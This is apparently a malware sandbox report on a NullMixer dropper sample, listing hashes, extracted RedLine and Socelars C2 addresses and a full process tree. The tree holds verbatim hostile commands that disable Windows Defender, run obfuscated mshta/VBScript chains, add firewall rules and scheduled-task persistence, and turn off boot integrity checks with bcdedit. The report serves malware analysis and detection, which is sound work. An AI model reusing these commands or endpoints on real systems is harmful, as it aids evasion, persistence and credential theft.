Overview

overview

10

Static

static

3

b592fd0fd3...fa.exe

windows7-x64

10

b592fd0fd3...fa.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/11/2024, 10:40 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

  • Size

    19.5MB

  • MD5

    929d44bb23bdaf1900b64c607b0d79f5

  • SHA1

    b24c6b9ffe07f42848b1b216127ae4031f7dc284

  • SHA256

    b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa

  • SHA512

    2c7fbd126ae014d876e86a489f5cfd633f29c70009380f6e459ce2b25c9c2a533d7217472c99f2e5687d16b72b8bed7ac3a2acb510fffc5ca5f77898f6b217ee

  • SSDEEP

    393216:xmdgzx7vz4dPQEf92YI+20uaVccpGaX/mlUBbRgAhRasJBg4qXRQvXowf:Mdgzt74ak9JU0u0nTPmWFRgAJxvYwf

Score
10/10
fabookiegluptebanullmixerprivateloaderredlinesocelarsmedia22m11publisher2user2211aspackv2discoverydropperevasionexecutioninfostealerloaderpersistenceprivilege_escalationrootkitspywarestealertrojan

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

redline

Botnet

user2211

C2

135.181.129.119:4805

Attributes
  • auth_value

    222774f9cd78b757b41900a0740f5b77

Extracted

Family

redline

Botnet

media22m11

C2

91.121.67.60:51630

Attributes
  • auth_value

    67c1e9660a9418bffb56bc0010363b04

Extracted

Family

redline

Botnet

Publisher2

C2

135.181.79.37:10902

Attributes
  • auth_value

    e8393a62fb4a9e46504192de2bb05302

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

    spywarestealerfabookie
  • Fabookie family
    fabookie
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba family
    glupteba
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

    droppernullmixer
  • Nullmixer family
    nullmixer
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Privateloader family
    privateloader
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 3 IoCs
  • Redline family
    redline
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars family
    socelars
  • Socelars payload 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
    evasiontrojan
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe
    "C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:352
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe
          Mon166dc6040fb8726.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2572
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
          Mon16bd4a93b822a.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:804
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1596
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon1661118952.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1920
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe
          Mon1661118952.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1672
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:616
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2772
              • C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE
                WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2556
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2452
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2492
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN( "C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W " , 0 , TrUe ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:1048
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1300
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" ECho "
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2144
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1764
                    • C:\Windows\SysWOW64\regsvr32.exe
                      regsvr32 -s aGKpQ.W
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:316
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill -IM "Mon1661118952.exe" -F
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1292
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2128
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe
          Mon16b7581baf7.exe /mixtwo
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1624
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
          Mon167f9db638e4.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
          • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"
            5⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2480
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              6⤵
                PID:1632
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  7⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2620
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe /306-306
                6⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2508
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1772
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  7⤵
                    PID:2004
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:2756
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1812
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2512
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2160
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:888
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1484
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2420
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1304
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2504
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2564
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2820
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2788
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2688
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1712
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1528
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    7⤵
                    • Executes dropped EXE
                    PID:2104
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2120
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2300
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1032
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe
              Mon1618e4439d986270.exe
              4⤵
              • Executes dropped EXE
              PID:372
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1708
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe
              Mon1631358b82299bd8.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1480
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2460
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:584
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2588
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
              Mon16d070a064013c841.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2016
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
                C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2132
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2864
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
              Mon16734014a69dec.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1508
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
                C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1868
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3000
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
              Mon16737798ac26f984.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1928
              • C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1948
                • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2836
                  • C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: GetForegroundWindowSpam
                    PID:2628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1068
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe
              Mon164c5af508c3.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1784
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2896
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
              Mon16957e622fa390.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:956
              • C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:292
                • C:\Program Files (x86)\Gparted\Build.sfx.exe
                  "C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  PID:588
                  • C:\Program Files (x86)\Gparted\Build.exe
                    "C:\Program Files (x86)\Gparted\Build.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3000
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2852
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:892
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672
                      8⤵
                      • Program crash
                      PID:1228
                • C:\Program Files (x86)\Gparted\gimagex.exe
                  "C:\Program Files (x86)\Gparted\gimagex.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:492
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2940
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe
              Mon16ac385cfd.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2368
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2992
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
              Mon16e127a54386dd68.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1100
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2216
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2984
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe
              Mon161bd381a14aea5c.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1448
